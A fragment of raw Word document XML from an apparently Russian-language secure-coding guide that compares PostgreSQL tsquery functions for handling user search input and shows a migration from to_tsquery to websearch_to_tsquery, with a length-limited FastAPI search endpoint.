              <w:t>User-input как operators</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EEBFCC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Syntax error на bad input</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E4D41A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Поддерживает phrase</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4DC51C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG-версия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3390180" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5EA18D83"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DEB29D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>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771489" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>парсит все operators</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5BD45E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ERROR + leak</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (3.15.2/3.15.4)</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EED2B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да (через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w: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16BC01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.3+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374011" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server-side built tsquery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="51A9D49E"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BEC369" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plainto_tsquery(q)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5B97C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>игнорирует все operators</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DA2786" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (safe)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2B1A0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (всегда AND)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92F415" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.3+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AAAC88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Простой keyword search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="77CCB31A"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4E8AEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>phraseto_tsquery(q)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34F55A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>игнорирует все operators</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B5415A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (safe)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991AB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>да (всегда phrase)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A2FCF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.6+</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CEFD00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phrase-only search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1A04D671"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FFDEF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>websearch_to_tsquery(q)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1865A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">restricted subset: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"..."</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR</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003739" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>нет (silently ignored)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534CBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">да (через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"..."</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w: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3CFFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11+</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3F1B3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Google-style user search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46A37A60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>рекомендуемый default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для user-facing search-endpoints (PG 11+). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для legacy (PG 8.3–10) или когда не нужны phrases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AA01A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Migration pattern: с `to_tsquery` на `websearch_to_tsquery`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFCB626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Было (уязвимо, см. 3.15.2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4AC31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AEAC37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE search_vector @@ to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211A0B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F1ACA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3ABD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Стало (безопасно):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA37B77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC47ED1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE search_vector @@ websearch_to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1641D1B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76167539" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Migration никак не ломает API</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C0A8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Простой keyword search (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=admin dashboard</w:t>
      </w:r>
      <w:r>
        <w:t>) работает одинаково в обеих функциях (AND-аются терминалы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4DFDB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Existing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-operators в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от старых клиентов больше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не парсятся</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — клиенты получат narrowed result set, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не ERROR</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B59A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если приложение ранее decompose-вал user-input на validated tokens (Variant 3.15.2 «как выглядит легитимное»), server-side built tsquery остаётся через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>legitimate use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и не подлежит migration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B4564" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Когда использовать какую функцию</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67BB4233"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421F27A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Сценарий</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5603AC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Функция</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="085A52E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E785EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User-input через query parameter, простой keyword search</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09C869" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plainto_tsquery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5BC98DE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2ABA4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User-input, Google-style UX (phrase quotes, negation, OR)</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396AF8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`websearch_to_tsquery`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (рекомендация)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0755C6C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4A5C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User-input, требуется именно phrase-only поиск</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6900EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>phraseto_tsquery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3BA2B0B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B6FD16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server-side built query из validated tokens + boolean toggle UI</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17EB18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>to_tsquery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (3.15.2 «легитимное»)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1B95E10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330C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User-input + advanced expert search-syntax (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NEAR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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52B927" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>НЕ передавать в `to_tsquery` напрямую</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — построить из tokens через build_tsquery (3.15.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FE613BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Расширенные защитные шаблоны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18905032" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для эндпоинтов, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> недоступен (PG ≤ 10) или где нужна валидация input length:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73613E6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A467CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F616A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1, max_length=200),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB90B08"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2BE8FE7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477A6F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
